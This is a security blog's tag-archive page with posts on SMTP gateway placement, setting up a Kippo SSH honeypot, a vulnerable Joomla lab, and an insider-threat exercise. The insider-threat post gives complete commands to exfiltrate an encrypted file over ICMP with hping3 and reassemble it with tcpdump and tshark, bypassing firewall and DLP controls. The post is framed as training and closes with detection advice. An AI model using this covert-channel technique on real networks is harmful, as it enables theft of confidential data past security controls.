Tag Archives: network security

SMTP Gateway placement

smtpWhere and how should I place my SMTP gateway in the security infrastructure?

I saw this question going around in one of the mailing list I am subscribed and would like to share some thoughts about it. This is old school stuff since our IT security perimeters are being diluted from a well-defined structure to unclear points taken by the new mobility, apps and cloud ecosystem. Every day new threats are exploiting the border-less network and mobile platforms are a prime target. However, companies still need the old and traditional security perimeter and its always good to refresh the old network security infrastructure architecture and concepts.In addition SMTP is a popular vehicle of malware infection and distribution.

To answer this question, there is no right or wrong answer since it all depends on your organization size and risk appetite. Designing a specific network security solution for a business of any size its a engineering and creative task. However, there any plenty of industry guidelines and best practices that you should follow in order to have a layered security approach with defense in depth using redundant and overlapping security controls that mitigates or reduces the risk. Lets review 3 technical suggestions for deploying your perimeter SMTP gateway.

Single-arm deployment : You can have a single-arm configuration in your perimeter firewall. This is a simple solution and makes routing and switching easy. In this DMZ you will position your SMTP appliance.  This appliance normally will be from one of the many SMTP GW products outhere like TrendMicro IMSS, Ironport ESA, eSafe Gateway, etc. This SMTP appliance will normally do Anti-Virus and Anti-Spam (both ingress and egress). With this solution you will have a single physical network interface. You will run all the services on this interface. This means the SMTP traffic to the internet and to the internal MTA such as Microsoft Exchange. You will also run all the management protocols like HTTPS, SSH for accessing the management interface, SNMP for monitoring, Syslog for logging and others like LDAP. This solution is very simple with almost no complexity and low maintenance costs. It wont need any special routing and switching and will be easy to troubleshoot. However, your security posture wont be the best and you wont have segregation of data, which means management and production/data traffic will run on the same interface. Plus you need to consider that running all these protocols on one interface it might consume significant amount of bandwidth from the physical interface.

Two-arm deployment : With this configuration you will have one interface connected to the outside, typically the external firewall and one interface connected to the inside, typically the internal firewall – Its also possible to create a two-arm solution with a single firewall – The appliance needs to have 2 physical interfaces each one in different subnets. Normally you call the external interface the frontend and the internal interface the backend. Management traffic will only be accessible trough the backend interface.

Three-arm deployment : If you must have management traffic separated from data/production traffic this is the best solution. Of course your security infrastructure framework should already support this kind of model in order to have proper routing and switching. This setup will require 3 physical interfaces each one on different subnets. Normally the management interface will be in the same subnet as other security infrastructure appliances management interfaces. With this solution you will have great control and flexibility over the data and management traffic which means better security. At the expense of routing and switching complexity you will gain great flexibility and control over the traffic . This solution is normally harder to troubleshoot.

Those three models are the ones typically seen in the enterprises from small, medium to large corporations.

In addition to the positioning you should also have defense in depth for the SMTP protocol. This means you should consider different layers of AV/Anti-Spam inspection. Normally, you will have inspection at gateway level, then at the MTA level and finally at the client level. You can further complement these levels with a layer 2 inspection gateway before or after your SMTP gateway. Do not forget to have IDS doing SMTP inspection trough the traffic path as part of robust network defense solution. Furthermore, you also need to address DNS concerns for SMTP to work properly. Apart of MX and A records for SMTP deliver you might need PTRs, SPF and others properly registered.

PS: If the time permits I will add some diagrams to illustrate each one of the deployment models.

Tagged , , ,

Deception Techniques

deceptionIn the Tactical Deception Field Manual FM 90-2 of the US Army, the concept of deception is described as those measures designed to mislead enemy forces by manipulation, distortion, or falsification of evidence to induce him to react in a manner prejudicial to his interests. In the cyber world the deception concept and deception techniques have been introduced in the early 1990 with the use of honeypots [1].

Honeypots are decoy systems that attract attackers to attempt to compromise them [2], whose value lies in being probed, attacked or compromised [3]. In addition, honeypots can be used to gain advantage in network security. For instance they provide intelligence based on information and knowledge obtained through observation, investigation, analysis, or understanding [4].

Deception techniques such as honeypots are powerful and flexible techniques offering great insight into malicious activity as well as an excellent opportunity to learn about offensive practices. In this post I will be introducing how to create a honeypot for research purposes to learn about attack methods.

If you want to learn more about computer deception I recommend to read Fred Cohen articles. In regard to honeypots in I definitely recommend the landmark book authored by Lance Spitzner in  2002 and published by Addison-Wesley.  One of the many things Lance introduces on his book is the concept of level of interaction to distinguish the different types of honeypots. Basically, this concept provides a way to measure the level of interaction that the system will provide to the attacker. In this post I will be using a medium interaction honeypot called Kippo.

A important aspect before running a honeypot is to make sure you are aware of the legal implications of running a honeypots. You might need to get legal counsel with privacy expertise before running one. The legal concerns are normally around data collection and privacy, especially for high-interaction honeypots. Also you might need permission from your hosting company if you would for example run a honeypot on a virtual private server (vps). Lance on his book as one full chapter dedicated to the legal aspects. Regarding hosting companies that might allow you to run a honeypot you might want to check  Solar vps, VpsLand or Tagadap.

Let’s illustrate how to setup the Kippo SSH honeypot. Kippo is specialized in logging brute force attacks against SSH. It’s also able to store information about the actions the attacker took when they manage to break in. Kippo is considered a low interaction honeypot.  In addition I will be demonstrating how to use a third party application called Kippo-graph to gather statistics and visualize them.

Based on the tests made the easiest way to setup Kippo is on a Debian linux distro. To install it we need a set of packages which are mentioned in the requirements section of the project page. On my case I had a Debian 6 64 bits system with the core build packages installed and made the following:

Using apt (advanced packaging tool) which is the easier way to retrieve, configure and install Debian packages in automated fashion. I installed subversion to be able to then download Kippo. Plus, installed all the packages mentioned in the requisites. Then verified python version to make sure is the one needed. During the installation of the mysql-server package you should be prompted to enter a password for the mysql.

# apt-get update
# apt-get install subversion python-zope python-crypto python-twisted mysql-server ntp python-mysqldb

# python –V
Python 2.6.6

Check the status of MySQL, then try to login with the password inserted during the installation:
# service mysql status
# mysql -u root -p
Enter password:
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 42
Server version: 5.1.66-0+squeeze1 (Debian)
mysql> quit

Check if we have a timesource configured and NTP is syncing:
ntpq> peers
ntpq> quit

Download Kippo using svn. Create the initial configuration file and then login into MySQL and create the necessary database and tables:
#svn checkout http://kippo.googlecode.com/svn/trunk/ /opt/kippo
#cd /opt/kippo/
#cp kippo.cfg.dist kippo.cfg
mysql -u root –p
mysql> CREATE DATABASE kippo;
mysql> USE kippo;
mysql> SOURCE /opt/kippo/doc/sql/mysql.sql
mysql> show tables;
mysql> quit;

Edit the kippo.cfg file and change the hostname directive, ssh port, and banner file. Also uncomment all the directives shown above regarding the ability of Kippo to log into the MySQL database. Make sure you adapt the fields to your environment and use strong passwords:

#vi kippo.cfg

ssh_port = 48222
hostname = server
banner_file = /etc/issue.net

host = localhost
database = kippo
username = root
password = secret

Edit the file /etc/issue.net on the system and insert a banner similar to the following:
This system is for the use of authorized users only. Individuals using this computer system without authority, or in excess of their authority, are subject to having all of their activities on this system monitored and recorded by system personnel. In the course of monitoring individuals improperly using this system, or in the course of system maintenance, the activities of authorized users may also be monitored. Anyone using this system expressly consents to such monitoring and is advised that if such monitoring reveals possible evidence of criminal activity, system personnel may provide the evidence of such monitoring to law enforcement officials.

Verify which username and password is used to deceive the attacker that he got the correct credentials and break in:
# cd /opt/kippo/data
# cat userdb.txt

Then add a non-privileged user to be used to launch Kippo. Its also needed to change the ownership of the Kippo files and directories to the user just created:
# useradd -m –shell /bin/bash kippo
# cd /opt/
# chown kippo:kippo kippo/ -R
# su kippo
$ cd kippo
$ ./start.sh
Starting kippo in background…Generating RSA keypair…

By default – as you might noticed in the kippo.cfg – Kippo runs on port 2222. Because we start Kippo as a non-privileged used we cannot change it to port 22. One way to circumvent this is to edit the /etc/ssh/sshd_config file and change the listening port to something unusual which will be used to manage the system. Then create an iptables rule that will redirect your TCP traffic destined to port 22 to the port where Kippo is running.
#cat /etc/ssh/sshd_config | grep Port
#service ssh restart

#iptables -t nat -A PREROUTING -i eth0 -p tcp –dport 22 -j REDIRECT –to-port 48022

Depending on your setup you might need or not additional firewall rules. In my case I had the system directly exposed to the Internet therefore I needed to create additional firewall rules. For the iptables on Debian you might want to check this wiki page.

Create a file with the enforcement rules. I will not be including the redirect rule because will allow me to have control when to start and stop redirecting traffic.
vi /etc/iptables.rules
# Sample firewall configuration
:RH-Firewall-1-INPUT – [0:0]
-A INPUT -j RH-Firewall-1-INPUT
-A FORWARD -j RH-Firewall-1-INPUT
-A RH-Firewall-1-INPUT -i lo -j ACCEPT
-A RH-Firewall-1-INPUT -p icmp –icmp-type any -j ACCEPT
-A RH-Firewall-1-INPUT -m state –state ESTABLISHED,RELATED -j ACCEPT
-A RH-Firewall-1-INPUT -m state –state NEW -m tcp -p tcp –dport 22 -j ACCEPT
-A RH-Firewall-1-INPUT -m state –state NEW -m tcp -p tcp –dport 2222 -j ACCEPT
-A RH-Firewall-1-INPUT -m state –state NEW -m tcp -p tcp –dport 48022 -j ACCEPT
-A RH-Firewall-1-INPUT -m state –state NEW -m tcp -p tcp –dport 48080 -j ACCEPT
-A RH-Firewall-1-INPUT -j REJECT –reject-with icmp-host-prohibited

I will be allowing ICMP traffic plus TCP port 22 and 2222 for Kippo and 48022 to access the system. Then the 48080 will be for the kippo-graphs.

Note that you might want to add the –source x.x.x.x directive to the rules that allow access to the real ssh and http deamon allowing only your IP address to connect to it.

Then we apply the iptables rules redirecting the contents of the file to the iptables-restore command. Then we need a small script for each time we restart the machine to have the iptables rules loaded as documented on the Debian wiki.

#iptables-restore < /etc/iptables.rules

#vi /etc/network/if-pre-up.d/iptables
/sbin/iptables-restore < /etc/iptables.up.rules

Change the file mode bits
#chmod +x /etc/network/if-pre-up.d/iptables

Subsequently we can install kippo-graphs. To do that we need a set of additional packages:
#apt-get install apache2 libapache2-mod-php5 php5-cli php5-common php5-cgi php5-mysql php5-gd

After that we download kippo-graph into the the webserver root folder, untar it, change the permissions of the generated-graphs folder and change the values in config.php.
#cd /var/www

# wget http://bruteforce.gr/wp-content/uploads/kippo-graph-0.7.2.tar –user-agent=””
# md5sum kippo-graph-0.7.2.tar
#tar xvf kippo-graph-0.7.2.tar
# cd kippo-graph
# chmod 777 generated-graphs

# vi config.php
define(‘DB_HOST’, ‘localhost’);
define(‘DB_USER’, ‘kippo’);
define(‘DB_PASS’, ‘secret’);
define(‘DB_NAME’, ‘kippo’);

Edit the ports configuration settings, under apache folder, to change the port into something hard to guess like 48080. And change the VirtualHosts directive to the port chosen.

 vi /etc/apache2/ports.conf
NameVirtualHost *:48080
Listen 48080

#vi /etc/apache2/sites-enabled/000-default
<VirtualHost *:48080>

#service apache2 restart

Then you can point the browser to your system IP and load the kippo-graphs url. After you confirmed its working you should stop apache. In my case I just start apache to visualize the statistics.

With this you should have a Kippo environment running plus the third party graphs. One important aspect is that, every time you reboot the system you need to: Access the system using the port specified on the sshd config file ;  Apply the iptables redirection traffic ; Stop the apache service and start Kippo. This can be done automatically but I prefer to have control on those aspects because then I now when I start and stop the Kippo service.

#ssh  vps.site.com  -l root -p 48022
#iptables -t nat -A PREROUTING -i eth0 -p tcp –dport 22 -j REDIRECT –to-port 2222

#service apache2 stop
Stopping web server: apache2 … waiting .
#su kippo
$ cd /opt/kippo/
$ ./start.sh
Starting kippo in background…
Loading dblog engine: mysql
$ exit

Based on my experience It shouldn’t take more than 48 hours to have someone breaking in the system. You can than watch and learn. In addition after a couple of hours you should start seeing brute force attempts.

If you want to read more about other honeypots, ENISA (European Network and Information Security Agency) just recently released a study about honeypots called “Proactive Detection of Security Incidents II: Honeypot”. It’s the result of a comprehensive and in-depth investigation about current honeypot technologies. With a focus on open-source solution, a total of 30 different standalone honeypots were tested and evaluated. It’s definitely a must read.

In a future post I will write about the findings of running this deception systems to lure attackers.

[1] The use of Deception Tecniques : Honeypots and decoys, Fred Cohen
[2] The Art of Computer Virus Research and Defense, Peter Szor, Symantec Press
[3] Honeypots. Tracking Hackers, Lance Spitzner, Addison-Wesley
[4] Designing Deception Operations for Computer Network Defense. Jim Yuill, Fred Feer, Dorothy Denning, Fall

Tagged , , , , ,

Hands-on Lab – eCommerce – Part 1

An important aspect of network security is hands-on experience. Considering this I would like to share a step-by-step guide that illustrates how to create a web content management system with eCommerce shopping card software. What is the purpose? The purpose is to create a simulated real world e-commerce website in a controlled and virtual environment. Here you can find known vulnerabilities that will allow you to learn and practice security concepts.  Will also allow you to have a scenario where you can practice offensive and defensive techniques legally, safely and for educational purposes. The scenario is based on an older version of Joomla and Virtuemart running on a LAMP (Linux, Apache, MySQL, PHP) stack.

Probably the most common attack vector against Joomla based content management websites is SQL injection vulnerabilities. The National Vulnerability Database shows 755 matching records when searching for CVE’s affecting Joomla versions. ExploitDB shows 839 potential exploits for different Joomla versions and a variety of components. 487 SQL Injection related, 30 Cross Site Scripting  42 Local File Inclusion, 25 Remote File Inclusion and others. If you are familiar with Vmware this scenario can easily be extended to an Attacker system with Backtrack plus a Firewall like pfSense and/or IDS like Snort between the systems. This will allow you to further extend your skills in intrusion analysis, incident handling and penetration testing and others.

Tagged ,

Insider Threat – Dee Cypher

On my previous post I wrote about gamification and how it can be used to learn security skills. Let’s further illustrate this with a challenge that represents the risks of insider threats. Exfiltrating data using covert channels. A typical case of espionage:

Justin Case, a high-priced lawyer and an operative for V.I.L.E. found that ACME is working on a new high-profile deal. Justin Case wants to get the hands on that information to sell it to the competitors. He just contacted another operational from V.I.L.E. Dee Cypher who has insider access to ACME. His mission is to smuggle confidential information bypassing the high end security controls in place like Firewalls and Data Lost Prevention. During a secret venue they shared some information: The ACME is running the latest version of Checkpoint Firewall with rigid rules however it allows ping requests to me made with a maximum ping size protection of 1400 bytes. Also to bypass DLP inspection they agreed that the information should be sent encrypted using symmetric encryption AES 256 bits with a shared secret that they agreed upon.

How can Dee Crypt and Justin Case accomplish this mission?

DeeCypher$ md5sum SecretPlans.pdf
0c376606bbbca8f089151df189edfd8b SecretPlans.pdf
DeeCypher$ openssl enc -e -aes-256-cbc -in SecretPlans.pdf -out SecretPlans.enc
DeeCypher$ ls –lrta
-rw-r–r– 1 DeeCypher DeeCypher 30800 2012-11-17 15:49 SecretPlans.enc
DeeCypher$ echo ‘scale=2;30800/1400’ | bc –q
DeeCypher$ sudo hping3 -E SecretPlans.enc -1 -u -d 1400 -c 22

JustinCase$ sudo tcpdump -nni eth0 -s0 proto 1 -w receiving.pcap
JustinCase$ tshark -r receiving.pcap -R ‘icmp.type==8’ -w data.pcap
JustinCase$ tshark -r data.pcap -T fields -e data | xxd -r -p > SecretPlans.enc
JustinCase$ openssl enc -d -aes-256-cbc -in SecretPlans.enc -out SecretPlans.pdf
JustinCase$ md5sum SecretPlans.pdf
0c376606bbbca8f089151df189edfd8b SecretPlans.pdf
JustinCase$ acroread SecretPlans.pdf

Lets describe the commands of Dee Cypher. First, the md5 of SecretPlans.pdf was produced, which can then be used to verify the file integrity. Next, the file SecretPlans.pdf was encrypted using AES-256-CBC algorithm resulting into SecretPlans.enc. Then, SecretPlans.enc was checked and it contains 30800 bytes. Now he wanted to know how many ICMP packets he will need to send the contents of the file using a payload of 1400 bytes. To do this he used the precision calculator bc in quiet mode. Divided the total amount of the file size by the size of the payload. The result was formatted to show two digits after the decimal point, it’s 22. It means, he will need to send 22 packets to send the whole contents of the file. To forge the ICMP packets hping3 was used. It’s specified the filename that will fill packet data, the traffic type using icmp mode with a data size of 1400 and a total of 22 packets.

On the other end, JustinCase executed tcpdump to capture ICMP traffic with no limit on the captured packet size. He extracted the traffic, using tshark, that matched wireshark filter ICMP Echo Request (type 8) and wrote it into data.pcap. Then, extracted the data portion of the ICMP payload. The output of this command was piped into xxd to convert the data into binary using plain hexdump style. The file was decrypted using the same algorithm and finally integrity was checked and the file was opened with acrobat reader.

Note: On this example a Checkpoint R75 with IPS and DLP blade enable was used. The IPS had configured a Max Ping Size of 1400 bytes.  By default the IPS does not have the Max Ping Size protection enable and the default value is 2500 bytes. Further, the ICMP traffic is not covered by DLP inspection which means the data could be sent in clear text instead of encrypted.

After having fun and eventually engage people to challenge this with other possibilities and tools let’s think about it. This example demonstrates that insider threat should be a serious concern by today organizations. In this case Intellectual property or confidential information could be stolen. Understanding how susceptible you are to insider threat is a valuable step in order to develop controls to detect, remediate and mitigate. Access to information outside of need to know, unauthorized encryption of information, unauthorized information transfer are examples of technical actions and indicators that could be used in this case as observables for a possible detection.

In 2006, the CERT coordination center which is located at Carnegie Mellon University released a technical report “Comparing Insider IT Sabotage and Espionage: A model-based analysis‘. This study considered not only the technical factors that contribute to Espionage and Sabotage cases but also the psychological, organizational and contextual factors. It’s definitely a good read for security professionals and leaders with responsibility on the organization security posture. Other than that the CERT Insider Threat Centers provides comprehensive and detailed information about this topic.

Tagged , , ,

Day one for Count upon Security

I am very excited about this new project. It will allow me to contribute to the IT security community with material about multiple security disciplines. My goal is to share comprehensive information, increase awareness and provide illustrations about security matters. Optimistically it will allow you to learn new skills, reinforce current ones or just read for fun and pleasure.At the moment I have lots of ideas on my mind about topics that would like to share and discuss with you and just need to start putting them on paper.

One of the main reasons I’m starting this blog is because I work on the security field and based on my experience I have reason to believe that information security industry will continue to grow in size, density and specialization. Therefore the demand for qualified security professionals who possess knowledge and skills will increase substantially. One of my aims is to help you grow your security expertise and awareness, that doesn’t mean you will find a job here but IT security career is a very interesting one to take.

Just recently, this article illustrates this job demand. As you could read, the Homeland Security Department from United States created a new fellowship program designed to attract recent college graduates into cyber security careers. Also they said that its cyber workforce increased by 600 percent over the last few years. Furthermore, the last search I made with keyword security on JobServe for IT & Telecommunications industry in the UK it shows 1429 jobs. On the Swiss job portal jobs.ch the last query I made with the same keyword gave 448 results – quite amazing considering the size of the country.

Tagged , , ,